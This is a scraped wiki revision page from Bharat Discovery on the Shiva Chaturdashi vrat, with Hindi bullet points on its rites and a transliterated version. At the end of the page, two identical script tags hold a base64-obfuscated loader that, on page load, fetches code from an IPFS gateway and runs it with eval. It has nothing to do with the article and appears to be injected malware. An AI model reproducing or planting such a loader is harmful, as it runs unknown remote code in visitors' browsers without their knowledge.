Difference between revisions of "शिवचतुर्दशी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[त्रियोदशी]] (अमान्त गणना के अनुसार) पर एकभक्त शिवचतुर्दशीव्रत किया जाता है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[त्रियोदशी]] (अमान्त गणना के अनुसार) पर एकभक्त शिवचतुर्दशीव्रत किया जाता है।
 
*[[शिव]] प्रार्थना; चतुर्दशी को उपवास; श्वेत [[कमल|कमलों]], [[गंध]] आदि से पाद से लेकर सिर तक [[शंकर]] एवं [[उमा]] की पूजा करनी चाहिए।
 
*[[शिव]] प्रार्थना; चतुर्दशी को उपवास; श्वेत [[कमल|कमलों]], [[गंध]] आदि से पाद से लेकर सिर तक [[शंकर]] एवं [[उमा]] की पूजा करनी चाहिए।
*यही [[कार्तिक]] की [[चर्तुदशी]] तथा अन्य चतुर्दशियों पर किया जाना चाहिए।
+
*यही [[कार्तिक]] की [[चतुर्दशी]] तथा अन्य चतुर्दशियों पर किया जाना चाहिए।
 
*[[मार्गशीर्ष]] से लेकर आगे के सभी 12 मासों में विभिन्न नामों से शंकर को प्रणाम करना चाहिए।
 
*[[मार्गशीर्ष]] से लेकर आगे के सभी 12 मासों में विभिन्न नामों से शंकर को प्रणाम करना चाहिए।
*प्रत्येक मास में 12 [[पदार्थ|पदार्थों]] में से (जैसे–[[गोमूत्र]], [[गोबर]], [[दूध]], [[दही]] आदि) किसी एक का पान करना चाहिए।
+
*प्रत्येक मास में 12 [[पदार्थ|पदार्थों]] में से (जैसे– गोमूत्र, गोबर, [[दूध]], [[दही]] आदि) किसी एक का पान करना चाहिए।
*विभिन्न [[पुष्प|पुष्पों] का प्रयोग, यथा–मन्दार, मालती आदि का प्रयोग करना चाहिए।
+
*विभिन्न [[पुष्प|पुष्पों]] का प्रयोग, यथा–मन्दार, मालती आदि का प्रयोग करना चाहिए।
 
*एक या 12 वर्षों तक कार्तिक में; वर्ष के अन्त में एक नील वृष का उत्सर्ग करना चाहिए।
 
*एक या 12 वर्षों तक कार्तिक में; वर्ष के अन्त में एक नील वृष का उत्सर्ग करना चाहिए।
 
*किसी विद्वान एवं सुचरित्रवान [[ब्राह्मण]] को घट के साथ में पलंग का दान करना चाहिए।
 
*किसी विद्वान एवं सुचरित्रवान [[ब्राह्मण]] को घट के साथ में पलंग का दान करना चाहिए।
*एक सहस्र [[अश्वमेध यज्ञ|अश्वमेघों]] का फल, महापातक भी कट जाते हैं।<ref>[[मत्स्य पुराण]] (95|5-38); कृत्यकल्पतरु (व्रत0 370-387); हेमाद्रि (व्रत खण्ड 2, 58-61); कृत्यरत्नाकर (466-471); निर्णयसिन्धु (226)</ref>
+
*एक सहस्र [[अश्वमेध यज्ञ|अश्वमेधों]] का फल, महापातक भी कट जाते हैं।<ref>[[मत्स्य पुराण]] (95|5-38); कृत्यकल्पतरु (व्रत0 370-387); हेमाद्रि (व्रत खण्ड 2, 58-61); कृत्यरत्नाकर (466-471); निर्णयसिन्धु (226</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 14:41, 23 July 2014

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl paksh ki triyodashi (amant ganana ke anusar) par ekabhakt shivachaturdashivrat kiya jata hai.
  • shiv prarthana; chaturdashi ko upavas; shvet kamaloan, gandh adi se pad se lekar sir tak shankar evan uma ki pooja karani chahie.
  • yahi kartik ki chaturdashi tatha any chaturdashiyoan par kiya jana chahie.
  • margashirsh se lekar age ke sabhi 12 masoan mean vibhinn namoan se shankar ko pranam karana chahie.
  • pratyek mas mean 12 padarthoan mean se (jaise– gomootr, gobar, doodh, dahi adi) kisi ek ka pan karana chahie.
  • vibhinn pushpoan ka prayog, yatha–mandar, malati adi ka prayog karana chahie.
  • ek ya 12 varshoan tak kartik mean; varsh ke ant mean ek nil vrish ka utsarg karana chahie.
  • kisi vidvan evan sucharitravan brahman ko ghat ke sath mean palang ka dan karana chahie.
  • ek sahasr ashvamedhoan ka phal, mahapatak bhi kat jate haian.[1]

tika tippani aur sandarbh

  1. matsy puran (95|5-38); krityakalpataru (vrat0 370-387); hemadri (vrat khand 2, 58-61); krityaratnakar (466-471); nirnayasindhu (226

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>